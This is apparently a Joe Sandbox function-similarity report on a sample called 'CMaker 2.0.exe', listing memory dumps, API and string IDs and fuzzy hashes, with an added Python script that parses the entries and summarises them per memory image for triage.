• Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
Similarity
• API ID: 00007$A43319B222F020
• String ID: _decode_filter_properties$argument 2$contiguous buffer
• API String ID: 3743873318-2431706548
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID: %ls: %ls$<FormatMessageW failed.>
• API String ID: 3479602957-1483686772
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
• Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmp
• Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
Similarity
• API ID: 00007A43319
• String ID: argument$compress$contiguous buffer
• API String ID: 543699976-2310704374
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
                                                                                                                                                                                  • Opcode ID: a359b4e95e1d4ffdf3b75e0a15f8e2470d7a7d379ae339a26f7f920b930d4175
                                                                                                                                                                                  • Instruction ID: 5dc2e192f1413adeda135654e5155e3f3ab25976811e2ec398e8b0453338fe77
                                                                                                                                                                                  • Opcode Fuzzy Hash: a359b4e95e1d4ffdf3b75e0a15f8e2470d7a7d379ae339a26f7f920b930d4175
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15D10576B08A4189E711CFB5E5442AC3771FB46B98B48427ACE6ED7BC9EE38D446C300
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
• Instruction ID: e9af51909ecaf57304369aa243da24b73cf1d51fcebe3604fb00abdc1c0d1e70
• Opcode Fuzzy Hash: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
• Instruction Fuzzy Hash: 19510676F042518AEB14CFB499856BC27B5AB0535AF94427ADD3E92AE5FF3CA402C700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: ef755d5346959fbddc4573098100f0e197fecc80316e8c20252f2b5a31e3b312
• Instruction ID: b5eb429c5e4092b119cacf4cea2f5e13590e17d726c14311ddacbf50a876947a
• Opcode Fuzzy Hash: ef755d5346959fbddc4573098100f0e197fecc80316e8c20252f2b5a31e3b312
• Instruction Fuzzy Hash: 1651AF26E186018AFB10CFB0D9503BD37B5AF49B48F588279DE29CB6C9EF38E4408740
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
• Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 069d66e8074b6e4703de35db5db5515e26a216a31024ef63481ff09b43250e3e
• Instruction ID: 169fe64612c8476c6f69dd71e364741b832b4025a238778e8a221d32aa6e93e0
• Opcode Fuzzy Hash: 069d66e8074b6e4703de35db5db5515e26a216a31024ef63481ff09b43250e3e
• Instruction Fuzzy Hash: FE110326B14F4189EB10DFA0E8592B833A4F759758F481F35DAAD47758EF7CD1688340
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
• Instruction ID: 2b74d2cd3a17fe161126b648920d5fd9407b83312d6fe739ee151535b486d9be
• Opcode Fuzzy Hash: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
• Instruction Fuzzy Hash: C0111862B14F058AEB00CB60E8542B833B4FB19758F441E35DA6DC67A4EF78E1548340
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Window$Process$ConsoleCurrentShowThread
• String ID:
• API String ID: 242035731-0
• Opcode ID: ce431efa17345d7651078cf11ef9ccbb6a86d2f3d8659cd5f010f407bfbcc38a
• Instruction ID: e7180606757f4cfd7e5bb07cb326d15bae3caec75fa8657e1e9d67d914981cf5
• Opcode Fuzzy Hash: ce431efa17345d7651078cf11ef9ccbb6a86d2f3d8659cd5f010f407bfbcc38a
• Instruction Fuzzy Hash: A9F03761A18A4AC1FB549B66E44413957B1FF88780F4860F0E95FC3294FE3CE0858700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Window$Process$ConsoleCurrentShowThread
• String ID:
• API String ID: 242035731-0
• Opcode ID: b8f031c1363efa834fdbd56010d3ef4b44edc5dcbdf772b005a24d0a5bd8a786
• Instruction ID: 05a9366ffd03da2348ac20c62290b627a7a5590dd87b49b4e410bcdde884e496
• Opcode Fuzzy Hash: b8f031c1363efa834fdbd56010d3ef4b44edc5dcbdf772b005a24d0a5bd8a786
• Instruction Fuzzy Hash: 3AF03061A19686C2EB549B25E88413922B1FF88B84F5860B4D96FC7794FF3CE485C700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
• API String ID: 4199793457-384499812
• Opcode ID: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
                                                                                                                                                                                  • Instruction ID: f16aad4695189304dba99f799cb4df71f52b6baf89cee2aa18527951e10ab485
                                                                                                                                                                                  • Opcode Fuzzy Hash: 068ff74c5e04d3b22dd643f34b65afc901536cdc3614985e071ae3aafa1cdff7
                                                                                                                                                                                  • Instruction Fuzzy Hash: D2D14C32B09B8692EBA69FA6D4A06BC33B8FB48B80F454035DE5D97795DF38E550C310
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
• API String ID: 4199793457-1331951588
• Opcode ID: feee6e66e635408aba00dfce115c2d520f221e3fcdfb8559fea45fb45ed583be
• Instruction ID: 2e0c6d44e466fbf1543e20a2b2ae3e5e64668e12aab790939a64f45cb7364548
• Opcode Fuzzy Hash: feee6e66e635408aba00dfce115c2d520f221e3fcdfb8559fea45fb45ed583be
• Instruction Fuzzy Hash: 83C16E76B0868282EBB6ABA5D4707B97368FB88B8CF144131DE4E67795CF78E544C700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B2246570
• String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
• API String ID: 511975427-118859582
• Opcode ID: 8335cbb17a8c73553454c38ef3cd25a79fd52b62f38be6b0172fb15f12420188
• Instruction ID: 3423be3ef517c1c1bbc91193eecd6704f86ddc0a7f569a583fb944bc96cfa8b2
• Opcode Fuzzy Hash: 8335cbb17a8c73553454c38ef3cd25a79fd52b62f38be6b0172fb15f12420188
• Instruction Fuzzy Hash: A751F721F0969646FEB29BE1D8603BD529AAF89B80F554031DE0DE77C6EE3CE442D300
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 64f7181257c50ae4d7613155abce06ba6a134164ab1a9db3b193907e2737411a
• Instruction ID: cfa2463eb1a1ebc9c1650b221a5598cd16787d1f4eff9315c97a79a652da1818
• Opcode Fuzzy Hash: 64f7181257c50ae4d7613155abce06ba6a134164ab1a9db3b193907e2737411a
• Instruction Fuzzy Hash: D1412862A0838A47FB248B65944137A6778EB81BA4F14D275EE6CC6AD9FE3CD4818700
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF8C02
  • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
  • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FABEB005), ref: 00007FF6FABF8C20
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
• API String ID: 3580290477-2216745502
• Opcode ID: 3897955feaaa9912254b388f55b996f76c329d0c77b7651028886ff0d95f410a
• Instruction ID: 36a7fa7b14d781534118eb1034c2535765f297f3acd69d3c8dd0a3e278423487
• Opcode Fuzzy Hash: 3897955feaaa9912254b388f55b996f76c329d0c77b7651028886ff0d95f410a
• Instruction Fuzzy Hash: 8041933AA09B1286EB14DFA5A5400B826A4FF457C4B98907EEA5DC3BC5EF3DE451D300
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentDirectory_invalid_parameter_noinfo
• String ID: .$:
• API String ID: 2020911589-4202072812
• Opcode ID: e2a8960fa0c92d631bccc768d851ef3d92cb48757f9f221cbbf1c59083278e06
• Instruction ID: beb4df30e8bc812d13d7fb72c5b811c9d9d9309b51880ec70d989ab4fa2dce3d
• Opcode Fuzzy Hash: e2a8960fa0c92d631bccc768d851ef3d92cb48757f9f221cbbf1c59083278e06
• Instruction Fuzzy Hash: 23418D62F18B1288FB109BF198511FC26B46F05748F9A5079DE2DE7ACAFF389441D314
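The entries above are easier to triage per memory image than per function: the String IDs carrying `..\s\ssl\` build-tree paths belong to the image at 0x7FFD935A0000 (OpenSSL code unpacked alongside the PyInstaller bootloader), while the image at 0x7FF6FABE0000 is the bootloader itself, resolving its own path with GetModuleFileNameW. The following parser is an added example, not Joe Sandbox code and not part of the report; it reads entries in the rendered format shown on this page and summarises them by image base. It assumes, because the values on the page fit that reading (0x20 on the exe's code region, 0x02 on its header, 0x04 on its data), that the fifth dotted field of a `.sdmp` name is a Win32 PAGE_* protection constant; the report itself does not document the field layout, so treat the RWX flagging as a lead to confirm in the dump, not a finding. The sample text is constructed from two of the page's entries.

```python
"""Added example: parse Joe Sandbox function-similarity entries and summarise
them per memory image.  Not the sandbox's own code; see the lead-in for the
assumption about the .sdmp file-name layout."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memoryapi.h; writable code in a loaded image is worth a look

# Assumed layout: <proc>.<phase>.<id>.<region base>.<protection>.<state>.<type>.<index>.sdmp
SDMP_RE = re.compile(
    r"\d{8}\.\d{8}\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.[0-9A-F]{8}\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp"
)
# The report renders a call as "<Name>.<Module>(args), ref: <addr>" or, with no
# recovered arguments, "<Name>.<Module> ref: <addr>"; subcalls carry a prefix.
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?([\w.]+)(?:\(| ref: )")
# OpenSSL compiles build-tree source paths into its error strings.
OPENSSL_SRC = re.compile(r"\\ssl\\|\\crypto\\", re.I)
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FuncEntry:
    image_base: int = 0
    regions: dict = field(default_factory=dict)  # region base -> protection value
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    instr_fuzzy: str = ""
    apis: list = field(default_factory=list)


def parse_entries(text: str) -> list:
    """One FuncEntry per 'APIs' block, in document order."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncEntry()
            entries.append(cur)
            section = "APIs"
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("• "):
            continue
        body = line[2:]
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                cur.apis.append(m.group(1))
            continue
        key, _, value = body.partition(": ")
        if key in ("Source File", "Associated"):
            m = SDMP_RE.search(value)
            if m:
                cur.regions[int(m.group(1), 16)] = int(m.group(2), 16)
            off = re.search(r"Offset: ([0-9A-F]+)", value)
            if off:
                cur.image_base = int(off.group(1), 16)
        elif key == "API ID":
            cur.api_id = value
        elif key == "String ID":
            cur.string_id = value
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            cur.instr_fuzzy = value
    return entries


def summarise(entries: list) -> dict:
    """Per image base: function count, OpenSSL path strings, RWX regions, APIs seen."""
    out = defaultdict(lambda: {"functions": 0, "openssl_refs": [], "rwx_regions": set(), "apis": set()})
    for e in entries:
        s = out[e.image_base]
        s["functions"] += 1
        if OPENSSL_SRC.search(e.string_id):
            s["openssl_refs"].append(e.string_id)
        s["rwx_regions"].update(r for r, p in e.regions.items() if p == PAGE_EXECUTE_READWRITE)
        s["apis"].update(e.apis)
    return dict(out)


# Constructed sample: two entries copied from this page, Associated lists shortened.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
• Instruction Fuzzy Hash: D2D14C32B09B8692EBA69FA6D4A06BC33B8FB48B80F454035DE5D97795DF38E550C310
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF8C02
  • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22), ref: 00007FF6FABFA0FA
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FABEB005), ref: 00007FF6FABF8C20
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
"""

if __name__ == "__main__":
    for base, s in summarise(parse_entries(SAMPLE)).items():
        print(f"{base:#018x}: {s['functions']} fn, openssl={s['openssl_refs']}, "
              f"rwx={[hex(r) for r in sorted(s['rwx_regions'])]}, apis={sorted(s['apis'])}")
```

Run against the full report text, the per-image summary separates bundled library code from the bootloader, and a non-empty `rwx_regions` set on an image's code pages is the cue to open the corresponding dump and compare it against the on-disk file before trusting the disassembly.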
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: e788713b5b8835d85b89640d10adf88a63234f8ab00a052097ad5adc3a9f47d8
                                                                                                                                                                                  • Instruction ID: aefef38375c9d439bbdae149e790bdf0e61b48d2cd66cb816b743ce3bdfd6143
                                                                                                                                                                                  • Opcode Fuzzy Hash: e788713b5b8835d85b89640d10adf88a63234f8ab00a052097ad5adc3a9f47d8
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD41B162A18A8182DB20CF65E4443AA67A4FB99794F858135EE5DC7788EF3CD441CB40
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
